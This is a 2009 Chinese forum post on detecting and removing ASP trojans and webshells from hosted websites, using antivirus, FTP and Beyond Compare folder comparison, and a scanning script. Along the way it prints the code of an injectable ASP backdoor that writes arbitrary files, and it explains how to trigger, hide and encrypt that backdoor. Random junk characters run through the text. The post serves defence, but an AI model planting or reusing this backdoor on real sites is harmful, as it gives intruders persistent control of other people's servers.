下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2486|回复: 1
打印 上一主题 下一主题

asp后门、asp木马大清理

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-4-17 08:32:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
    + y. m! Y% x2 `; {# L' D" y7 i9 y; o! U& m
    通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 7 X# P5 b; o# }5 r) h& Y2 C
    : M' T% y6 y3 e9 |$ ]
    一.技巧1:杀毒软件查杀 " B- d/ I2 e3 r, a9 r9 m
    : b1 n2 U4 U8 [
    一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
    7 G% p. i5 W- O! ]! H7 C9 y* i8 w3 a0 z
    利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
    ; z: L9 t! ]+ U* ~5 W, Z2 s! q* R& h6 V8 K" G6 I/ G: P
    二.技巧2:FTP客户端对比 " [, B/ S* `: A# D* Y

    ! _% H0 I+ t. u& W' z上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
    # A/ ?. x  D6 X% l+ d: m9 `+ e. t! Y+ v7 i0 w1 M* U
    screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 ) U1 L+ {, P4 p/ ^' ]
    . z8 }! n4 T5 p; L& C
    经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 5 X( j3 E/ L% v

    & @" a' i5 t! _' N& a# e4 q等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
    8 }$ E0 L. G' d- o
    1 \9 e0 U, f4 Q0 e7 |2 R盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 $ ^' g. Z. A# c9 g7 v2 w- p: C/ E
    , @3 ]! t5 \8 ]0 w9 q
    所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
    9 p, A- x: m) y/ ?( Z2 n4 W" W% n- c; Q
    这里以FlashFXP进行操作讲解。
    + U. u6 e& b5 |( W4 W
    " \* s+ r7 E- U8 N7 p2 N" Z/ ~步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
    ) v% D' t+ e2 y- ]6 N) P! a8 f" R  I1 f% d; P5 c: g" T
    步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。
    ( g- i" r; w7 t- V5 [! y( g( K- h, M& X; O1 X! m
    我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
    . }+ R! r: \8 V' R7 G! V  i: h/ m三.技巧3:用Beyond Compare 2进行对比
    ) k  \3 f8 t/ i( ^8 S% N7 p' J" q
    上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: 9 [% v5 S/ \; b3 |+ f' l

    , s3 x# G9 i3 m8 u/ a' G% ^0 a〈% & }( W, W! x/ W2 x
    * v% ^) H3 y2 \0 x- p( s2 @: x
    on error resume next
    9 b* W0 ~5 l4 E* D( a3 R) q1 ~
    4 Z6 Z- s/ J9 z! Lid=request("id")
    ( n; b5 x9 _7 c+ B. L- F% }7 P+ i$ q( b
    if request("id")=1 then + u' I, q9 G# k' J* E

    ' o4 Q7 H% L5 r6 K2 z. Vtestfile=Request.form("name") : {; x% r. n$ q! A* M+ Q$ _/ ]

    & B. ~: Y3 c: Q8 smsg=Request.form("message") 7 p5 x4 N/ G+ P& j0 o
    ( x& o6 I! d' }: s
    set fs=server.CreatObject("scripting.filesystemobject") 2 R2 t' ^! }- h6 k. D) ^8 x7 r2 M) b
    2 D6 e7 i" X, ?( p' G1 ~. r
    set thisfile=fs.openTestFile(testfile,8,True,0)
    ' H6 P1 ~* t8 G! D6 B4 P/ X6 |) p0 f9 ~; I& O# W$ i. ^. D& _7 H- y
    thisfile.Writeline(""&msg&"")
    , R" Q3 \: O( Q5 z; y6 |7 S$ ?- ~7 W5 J* d" \% W. Q( I
    thisfile.close
    1 Q" J2 g) [8 X2 n% r7 J# ^* m! y
    " M" p. K9 K3 e- R: j( t$ i2 uset fs=nothing
    1 |) c1 ^% A# m& R0 J; h  u8 D
    ' T" r* O% ?9 v" k- K& t, K; s%〉 3 G' M  J# Y+ I4 ~, z$ }

    ( B% n: W, S) O. v  v* b( Z$ b: x' D〈from method="post" Action="保存"?id=1〉 ) C7 {/ s1 W( O, a* ^' C
    ( ?, W4 V/ s3 n( D( ^
    〈input type="text" size="20" name="Name"
    5 Z2 ~" U; A" i9 r* S1 S, X. ]% B& L9 Y2 m2 S. S3 \
    Value=〈%=server.mappath("XP.ASP")%〉〉
    7 \, p; y  m" Y+ O
    ! ]/ j* N4 {( }( E* w% S〈textarea name="Message" class=input〉 + O$ O! F( s. \8 C5 k+ ^4 D; v9 o& [
    # I& j+ s" B- G" O
    " ?) h9 g" h! f" W8 `/ o
    〈/textarea〉 $ W( b: c' n3 \* w

      t9 M, H3 L5 x* K〈input type="Submit" name="send" Value="生成" + P+ v& f( |7 h
    $ J! g5 F- w4 R  c9 B+ b8 }5 a2 k- H
    class=input〉
    6 x7 d2 u. ?$ x6 H/ p0 y9 j5 I: r( l* V8 U+ |2 D& C
    〈/from〉
    & ]9 L  d& j9 U% ?4 v
    * _2 h( n# D2 e: w6 T1 F6 D〈%end if%〉 ; T) O7 H0 u- E9 j( y+ E& \

    & n1 M# J8 l0 l: M8 b9 u: q' A2 @; K注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 7 z! T1 _; G' e" c2 b

    : {; x% l: J9 |$ I1 B# b假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 ) u8 N' X: t: o0 _+ d

    # h  g# g0 u. c3 h' v这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 5 Y+ d8 j  I+ U8 B& S: z9 U

    / |" n( j% j( D6 {: f; J/ IBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。

    2 A9 o2 m% q! Z
    % A3 P; R# }" r: F0 b! `* o2 }看我来利用它完成渗透性asp木马的查找。
    7 U1 o$ a7 g4 O: B8 k3 p; |& \3 g
    ) x+ r" O+ m- D  L. J步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
    + S* I' d3 ~! W: G' p2 y+ q2 T: r# m
    步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
    1 _, j9 D  B( Q* G& `. _/ y& x# ]) s
    步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! ( a" G+ v9 G% B/ i3 G- k1 F! O
    % I) c, v9 N: j) a( i

    6 ~' N# W  L) q5 n! w5 y: h; n四.技巧4:利用组件性能找asp木马 7 O% m, N1 x2 x9 v
    " R. U7 V' m" z
    上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
    1 c: U# I0 e* f$ p& t* g/ e/ {0 J" g0 F: V: W" }0 p5 N0 x
    如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
    7 D' R1 v* e. }6 C; o1 Y$ m% O
    它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 % w4 R" J1 X# S/ s- J! ~3 |
    0 I0 c4 S. b5 R: c/ ^- G  x, o
    使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
    $ }( [5 |: {; ~% y1 ]4 {, B7 N
    9 S+ ?3 v7 E/ D, c0 P一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 / g# N& ]" T; z, C3 [# }

    8 q3 `8 H2 O+ Z7 f# V6 b: m; @8 b大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-4-17 13:22:05 | 只看该作者
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表